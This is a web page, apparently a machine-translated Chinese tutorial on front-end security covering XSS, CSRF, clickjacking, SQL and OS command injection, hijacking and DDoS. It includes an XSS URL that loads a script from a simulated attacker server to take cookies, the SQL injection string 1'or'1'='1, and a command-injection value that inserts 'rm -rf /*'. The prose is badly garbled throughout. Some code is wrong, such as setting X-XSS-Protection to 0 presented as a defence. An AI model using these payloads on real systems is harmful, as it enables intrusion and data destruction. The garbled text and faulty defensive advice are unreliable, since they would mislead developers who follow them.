The most detailed history of front-end security

Others 2020-01-20 02:21:59 views: null

cyber security

The front end does not require perfect knowledge of network security, but can understand the majority of network security, and can be carried out before a simple defense twenty-three is needed

Tell us about common security issues, solutions, and a small Demo, hope you like

Network Security Rollup

  • XSS

  • CSRF
  • Clickjacking
  • SQL Injection
  • OS injection
  • Request hijacking

  • DDOS

In my opinion, the front end can understand and former defense 4 on it (quietly forced forced: big brother when I did)

XSS

Cross Site Scripting also known as cross-site scripting attacks itself should be called CSS, but because CSS is occupied, but unfortunately the next is called XSS

what is XSS?

Let's start with what the literal sense, cross-site -> name suggests is that we go from one site on another site, the script -> This is what we wrote a script to the page content, it can be understood as a write js code, the last we caused the attack on the website

For example: After we log on a website, usually the logged saved in a cookie, when we went to visit another site, it will read the cookie

XSS hazard

  • Using false Lee lost START Using the cheat sheet for your own personal information.

  • Using scripts Lee steal Use households Cookie value, the victim unknowingly help the attacker to send malicious requests.

  • Show fake files chapter or drawing the picture.

A simple demonstration

// 普通
http://localhost:3000/?from=china
// alert尝试
http://localhost:3000/?from=<script>alert(3)</script>
// 如果可以弹出3,证明这个输入框没有过滤html标记

Analog get cookie

http://localhost:3000/?from=<script src="http://localhost:4000/hack.js">

Background code

const koa = require('koa');  //启动在4000端口上
const chalk = require('chalk')
const log = contents => {
    console.log(chalk.red(contents)) //打印cookie
}

// 模拟黑客网站
const app = new koa();

module.exports = app

Defensive measures

  1. Set HEAD
ctx.set('X-XSS-Protection', 0) // 禁⽌XSS过滤
  1. Setting HttpOnly Cookie
    This is the watch segment defensive prevent XSS attacks to steal user cookie Using the most effective. Web of the applications at the time of cookie settings, its property to HttpOnly, you can avoid the ⽹ ⻚ client's cookie is malicious JavaScript theft, protection Use households cookie information.
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly")
  1. CSP
    Content Security Policy (CSP, Content Security Policy) is ⼀ additional layer of security, Use to help detect and mitigate certain types of attacks, including cross-site scripting (XSS) and data injection attacks such as START. Use to achieve these attacks can steal data from website for damage to or as a malicious software distributions, etc. Use way.
    CSP is essentially built on attention immediately white list, developers explicitly tell the browser which can load external resources and YES. We only need to configure rules, how to intercept is achieved by the browser Your Own. We can minimize this shutter mode
    XSS attacks.

CSRF

CSRF (Cross Site Request Forgery), that is, cross-site request forgery, is often ⻅ ⼀ kind of Web attacks, which the user has logged Lee Use Use of identity, in the case of Use without the knowledge of the user, the name comes in handy complete Using household French operation.

what is CSRF?

Or literally to analyze, cross-site or from a Web site refers to a different site, at no XSS it is that he is a request, means that we send out a request on other sites, and this request is forged out

  • Using the user has logged into your website A, and the cookie in the local record

  • In the case of Using the user does not log out of site A (that is, the case of cookie ⽣ efficiency), visited the site to lure dangerous malicious attacker-supplied B (B site requires access to the site A).

  • A site does not do any CSRF defense

CSRF harm

  • Lee Use Use households login state

  • Using the family's knowledge
  • The completion of the service request
  • Using steal households owned ⾦ (transfers, consumption)
  • Use the back door posing posting pot

  • Website for damage to reputation

CSRF defense

  • Is prohibited with third ⽅ website for Cookie - there are compatibility issues

  • Referer Check - Https not send referer

  • Verification code

Clickjacking

Clickjacking is ⼀ kind of visual spoofing the watch segment. The attacker would need website for attacks by nested shutter mode embedded iframe Your Own ⽹ ⻚ START, and the iframe to be transparent, revealing ⼀ user clicks button Use induced in the ⻚ ⾯.

what is clickjacking?

Clickjacking it means to induce the user clicks on, put a picture below, it is estimated to have learned

How clickjacking defense

The OPTIONS-FRAME-the X-
the X-FRAME-is-the OPTIONS ⼀ a HTTP response header, in modern browsers have ⼀ a good ⽀ support. The HTTP response header is to defense Using iframe nested clickjacking attacks.

ctx.set('X-FRAME-OPTIONS', 'DENY')

JS way

<head>
 <style id="click-jack">
 html {
 display: none !important;
 }
 </style>
</head>
<body>
 <script>
 if (self == top) {
 var style = document.getElementById('click-jack')
 document.body.removeChild(style)
 } else {
 top.location = self.location
 }
 </script>
</body>

SQL Injection

sql database is a language we learn, and injected on behalf of the database is to start from the front

what is sql injection?

The following code can be seen, when (time splicing sql statement) we string concatenation, bug appears similar to a pipe character, 1 | 0, then this statement is true for the constant

// 填⼊特殊密码
1'or'1'='1
// 拼接后的SQL
SELECT *
FROM test.user
WHERE username = 'laowang'
AND password = '1'or'1'='1'

Defensive measures

In fact, defense is simple, each language provides a different way, but the principle is not to string concatenation, but with placeholders

  • Using the Web should strictly limit the operation of the database permissions ** Use this to only be able to offer users full EMPTY its lowest authority ⼯ made from ⽽ limit reduction is largest NOTE START attacks harm to the database

  • Gets into the database of the special characters ( ',',, <,>, &, * ,; etc.) Perform escape processing, or code conversion. ** substantially all of the rear end of the string into your language and have Remedies ⾏ escape processing, the lodash._escapehtmlchar ⽐ as lodash library.

  • The code checks whether the rear end of the transmission data START * line with expectations, restricted type of variable, e.g. Use regular expression matching process into ⾏ ⼀ more.

I never learned a few defenses, a new front-end Meng

OS command injection

OS command injection, and SQL injection START START similar, but SQL injection START START is the command for injection, ⽽ OS database is for the operating system. OS command injection attacks START refers to apply it through the Web, Perform comes in handy method of operating system commands to reach destination time of the attack. Use can be transferred as long as the Shell function in places where there exists the risk of being attacked ⻛. If the tone was negligent when Using the Shell, you can Perform the Insert command comes in handy method.

// 以 Node.js 为例,假如在接⼝中需要从 github 下载⽤户指定的 repo
const exec = require('mz/child_process').exec;
let params = {/* ⽤户输⼊的参数 */};
exec(`git clone ${params.repo} /some/path`);

If the argument is

https://github.com/xx/xx.git && rm -rf /* &&

Request hijacking

  • Hijacking DNS
    name implies, DNS server (DNS parse each step) has been tampered with, the results of the modified domain name resolution, such access is not intended to ip

  • HTTP hijacking operators hijacking, this time Approximate can only upgrade the HTTPS

DDOS

distributed denial of service attacks Distributed Systems

what is DDOS?

DDOS attacks are not ⼀ species, ⽽ is ⼀ zoomed class attack in general. It has to get accustomed ⼗ types, new attacks Remedies are constantly invented. When running a website for each link, it can attack a target. As long as ⼀ a broken link, makes the whole process run up, reached the destination time services of paralysis.

Among them, more often ⻅ ⽐ of ⼀ kinds of attacks cc attack. It is simply the amount of normal zoomed violently sent request, from the largest receiving server exceeds the amount, resulting in downtime. I encountered is cc attack, most of the time around the world more than 20 IP addresses Approximate turn makes a request, the request amount for each address in the 200 to 300 times per second. I see the visit date annals of time, I felt like those requests coming flood water resistant ⼀ kind, ⼀ blink is ⼀ zoomed heap, to get accustomed minutes, the volume of files on the date Chi zoomed up 100MB. To be honest, this can only be considered ⼩ attack, but my Face website for no protection, server or shared with other PORTRAIT, such traffic ⼀ come off the assembly line immediately while.

How to defend

To put it plainly spend money to solve

Guess you like

Origin www.cnblogs.com/sunhang32/p/12216125.html
Recommended
Ranking
vue project automated build tools 1.0, support for multi-page build
JDBC add, update, delete data
SpringCloud combat service in response to the decline tutorial series (Chapter IV)
A segmentation fault (core dumped) error occurs when C+11 compiles and calls the PCL library
Django achieve websocket
Go语言并发之道--笔记1
Three-tier structure and application
Zhejiang data structure after-school exercise practice two 7-2 Reversing Linked List (25 points)
Front-end interview brushing day9 (updated daily high-frequency inspection points for front-end interviews)
The difference between the shell of the single and double quote
Daily
More
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)

Code World

© 2018 codetd.com